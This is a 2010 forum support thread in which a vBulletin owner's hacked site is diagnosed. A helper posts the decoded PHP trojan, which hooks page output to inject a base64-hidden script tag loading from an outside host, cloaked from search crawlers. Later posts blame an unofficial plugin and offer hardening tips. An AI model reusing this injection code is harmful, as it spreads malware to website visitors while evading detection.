What Happened To My Forum? HELP!!!!

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Daniel.P
    Senior Member
    • Apr 2008
    • 600
    • 4.0.x

    #16
    is not normal.
    maybe the forum is hacked.
    check the original file to compare
    or maybe some plugin

    try to disable them from admin CP
    Last edited by Daniel.P; Tue 27 Apr '10, 2:38am.
    born to fish forced to work

    Comment

    • Daniel.P
      Senior Member
      • Apr 2008
      • 600
      • 4.0.x

      #17
      after decoding
      Code:
      m«ë‡^r‡^if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){   $GLOBALS['mr_no']=1;   if(!function_exists('mrobh')){      if(!function_exists('gml')){     function gml(){      if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){       return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9jZWNoaXJlY29tLmNvbS9qcy5waHAiPjwvc2NyaXB0Pg==");      }      return "";     }    }        if(!function_exists('gzdecode')){     function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){      $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));      $RBE4C4D037E939226F65812885A53DAD9=10;      $RA3D52E52A48936CDE0F5356BB08652F2=0;      if($R30B2AB8DC1496D06B230A71D8962AF5D&4){       $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));       $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];       $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&8){       $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&16){       $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&2){       $RBE4C4D037E939226F65812885A53DAD9+=2;      }      $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));      if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){       $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;      }      return $R034AE2AB94F99CC81B389A1822DA3353;     }    }    function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){     Header('Content-Encoding: none');     $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);       if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){      return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);     }else{      return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();     }    }    ob_start('mrobh');   }  }
      born to fish forced to work

      Comment

      • CEO254
        Senior Member
        • Jan 2008
        • 221
        • 4.1.x

        #18
        wow, I just deleted that code and the forum now works fine

        What do I do to make sure this never happens again?
        <signature removed by staff>

        Comment

        • Daniel.P
          Senior Member
          • Apr 2008
          • 600
          • 4.0.x

          #19
          install on your own server.
          Watch the installation of plugins which are not official !!!
          born to fish forced to work

          Comment

          • CEO254
            Senior Member
            • Jan 2008
            • 221
            • 4.1.x

            #20
            I dont have my own server, im on a shared hosting plan

            Is there a way I can stay on here?
            <signature removed by staff>

            Comment

            • Daniel.P
              Senior Member
              • Apr 2008
              • 600
              • 4.0.x

              #21
              Ask the provider what happened.
              I do not know where it came from can be a problem of security on provider host
              or is something you install additional
              born to fish forced to work

              Comment

              • CEO254
                Senior Member
                • Jan 2008
                • 221
                • 4.1.x

                #22
                I had re-enabled the "vS-Hide Hack Resurrection (Expanded Edition)" which made my forum mess up again. So I believe this is what caused my forum to be hacked.

                I have un-installed the plugin and everything is fine now.


                Now all im worried about is this happening again...

                Should I change passwords?
                <signature removed by staff>

                Comment

                • Daniel.P
                  Senior Member
                  • Apr 2008
                  • 600
                  • 4.0.x

                  #23
                  I think the problem was in the plugin.
                  No need to change your password but do it no problem
                  born to fish forced to work

                  Comment

                  • a legacy reborn
                    Member
                    • Feb 2010
                    • 87

                    #24
                    Make sure ur config file and all php files are set to 644 permissions and only use vb.org for plugins

                    Comment

                    • raja811
                      Senior Member
                      • Aug 2006
                      • 129
                      • 3.6.x

                      #25
                      Originally posted by a legacy reborn
                      Make sure ur config file and all php files are set to 644 permissions and only use vb.org for plugins
                      My forum not working after i give permission 644 !!! please help me!!!!!

                      Comment

                      • TalkBaja
                        New Member
                        • Jun 2009
                        • 14
                        • 3.8.x

                        #26
                        Looks like this is the same trojan.

                        Comment

                        Related Topics

                        Collapse

                        Working...